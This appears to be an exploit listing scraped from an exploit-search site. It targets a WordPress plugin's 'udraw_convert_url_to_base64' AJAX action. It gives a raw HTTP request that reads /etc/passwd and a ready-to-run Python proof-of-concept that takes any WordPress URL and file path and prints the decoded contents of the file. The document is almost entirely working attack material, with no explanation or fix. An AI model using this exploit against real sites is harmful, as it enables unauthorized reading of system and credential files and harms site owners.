Share
## https://sploitus.com/exploit?id=WPEX-ID:925C4C28-AE94-4684-A365-5F1E34E6C151
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Connection: close
action=udraw_convert_url_to_base64&url=/etc/passwd
#!/usr/bin/env python3
#
# Usage:
# python3 poc.py <wordpress root url> <absolute filepath to include>
#
# Example:
# python3 poc.py http://127.0.0.1:8080/ /etc/passwd
#
import sys
import base64
import requests
target_url = sys.argv[1]
filepath = sys.argv[2]
with requests.Session() as session:
response = session.get(target_url)
response = session.post(f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php", data={
"action": "udraw_convert_url_to_base64",
"url": filepath,
})
b64_file = response.text.split(",")[1].strip('"')
print(base64.b64decode(b64_file).decode())